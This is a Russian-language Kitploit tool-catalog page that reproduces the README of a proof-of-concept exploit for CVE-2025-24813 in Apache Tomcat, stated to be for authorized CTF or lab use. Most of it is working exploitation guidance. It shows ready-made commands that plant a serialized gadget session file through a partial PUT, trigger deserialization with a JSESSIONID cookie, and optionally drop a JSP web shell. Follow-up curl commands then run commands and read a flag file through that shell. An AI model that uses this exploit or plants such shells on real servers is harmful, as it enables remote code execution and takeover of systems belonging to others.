Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-24813 — правильный payload для java CVE | Kitploit
Инструменты/GitHubGitHub/loufa0/cve-2025-24813
Сканеры уязвимостейЭксплуатацияВеб-безопасностьCTFОбучение и ОбразованиеЛаборатории и Практика
GitHubloufa0/cve-2025-24813

CVE-2025-24813

правильный payload для java CVE

Репозиторий
2 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-24813 Tomcat PoC

PoC для авторизованной среды CTF/лаборатории. Он эксплуатирует CVE-2025-24813 через частичную запись PUT файла сессии Tomcat, а затем запускает десериализацию с помощью JSESSIONID.

Предварительные требования

  • Python 3
  • Модуль Python requests
  • Java JDK (java и javac)
  • Включённый файл commons-collections-3.2.1.jar, размещённый в этой папке

ysoserial не требуется.

Файлы

  • poc_cve_2025_24813.py: обёртка Python, автоматизирующая генерацию, загрузку и триггер.
  • GenerateTomcatSessionPayload.java: генерирует валидную сессию Tomcat, содержащую гаджет CommonsCollections.
  • commons-collections-3.2.1.jar: зависимость гаджета.
  • sh.jsp: опциональный JSP-шелл, разворачиваемый через --drop-shell.

Использование

Разместить JSP-шелл в веб-корне по умолчанию /opt/tomcat/webapps/ROOT:

root@kitploit:~
./poc_cve_2025_24813.py http://TARGET:8080 \
  --session-id poc24813 \
  --drop-shell \
  --shell-name sh.jsp

Выполнить прямую команду без размещения шелла:

root@kitploit:~
./poc_cve_2025_24813.py http://TARGET:8080 \
  --session-id cmd24813 \
  --cmd 'id > /opt/tomcat/webapps/ROOT/rce.txt'

Если веб-корень отличается:

root@kitploit:~
./poc_cve_2025_24813.py http://TARGET:8080 \
  --drop-shell \
  --webroot /path/to/webroot \
  --shell-name sh.jsp

Если JAR-файл перемещён, укажите его путь:

root@kitploit:~
./poc_cve_2025_24813.py http://TARGET:8080 \
  --jar /path/to/commons-collections-3.2.1.jar \
  --drop-shell

После эксплуатации

Если --drop-shell успешен:

root@kitploit:~
curl --get --data-urlencode 'cmd=id' http://TARGET:8080/sh.jsp
curl --get --data-urlencode 'cmd=cat /opt/tomcat/user.flg' http://TARGET:8080/sh.jsp

Условия на стороне цели

  • Уязвимая версия Tomcat.
  • DefaultServlet доступен для записи, обычно readonly=false.
  • Поддержка частичного PUT.
  • Постоянные сессии через PersistentManager и FileStore.
  • Цепочка гаджетов, доступная на стороне сервера, здесь commons-collections.

Ожидаемое поведение при загрузке — часто HTTP 409 Conflict на:

root@kitploit:~
PUT /<session-id>/session
Content-Range: bytes 0-1000/1200

Затем десериализация инициируется с:

root@kitploit:~
Cookie: JSESSIONID=.<session-id>
Скачать инструмент